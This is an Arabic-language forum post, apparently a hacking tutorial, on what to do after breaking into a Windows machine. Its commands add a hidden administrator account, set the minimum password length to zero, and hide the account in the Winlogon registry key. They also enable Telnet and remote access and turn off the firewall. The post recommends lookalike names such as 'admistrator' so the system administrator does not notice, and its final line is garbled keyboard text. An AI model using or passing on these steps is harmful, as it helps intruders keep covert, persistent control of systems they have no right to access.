السلام عليكم ورحمة الله تعالى وبركاته
شرح بسيط ومفصل لاهم المراحل التي نتبعها بعد اختراق نضام windows
حسنا في حالات التدريب و الاختراق التخريبي و الاختراق للتحدي ننشئ مستخدم بأسمائنا أو بألقابنا و لكني أحيانا أحبذ أن أستخدم أحد المستخدمين الموجودين و الغير مستخدمين أو إنشاء مستخدم شبيه بأسمائهم مع فارق بسيط في التجئة و التي قد لا ينتبه إليها مدير النظام وهذا اهم شي ! بنعمل اشياء بتخفي ...ماحد بيكشفنا ونضمن العوده مرة تانية ...
إضافة مستخدم و كلمة مرور كود:
net user USER_NAME USER_PASS /add
إضافة المستخدم إلى مجموعة المدراء Administrators كود:
net localgroup administrators USER_NAME /add
تغيّير كلمة مرور المستخدم لتقليل طول كلمة المرور المسموح بها كود:
net accounts /minpwlen: length
مثال : كود:
net accounts /minpwlen: 0
الحين اهم خطوه وهي اخفاء المستخدم
اتصل فورا بالجهاز عن طريق الـ Remote Desktop
إذهب إلى قائمة إبدأ أو Start و اختر Run و اكتب regedit.exe
اذهب إلى المسار التالي :
كود:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\
ابحث عن اسم المستخدم الذي أنشأت و انقر عليه نقرتين و غيِّر قيمته إلى صفر =
0 . فإن لم تجده !, إضغط الزر الأيمن بالفأرة و أختر ” New > DWORD Value ”
و أنشئ مفتاح جديد بنفس اسم المستخدم الذي تريده
بالظبط
اجعل القيمة تساوي صفر
تفعيل الـTelnet كود:
sc config TlntSvr start= auto net start TlntSvr
تفعيل الـ Remote Desktop
كود:
sc config DcomLaunch start= auto net start DcomLaunch
لإغلاق الجدار الناري كود:
netsh firewall set opmode disable
وفي الاخير نصيحه صغيره :
عند آضافة مستخدم جديد فانصح بهذا الاسم : admistrator
admen
admin
ماراح تنكشف ...ان شاء الله
:grrrrrr:
تحياتي ... ههه
lJJJJJJJJJJJJh`h jtug uk]lh jojvr kqJJJJJJJJJhl windwos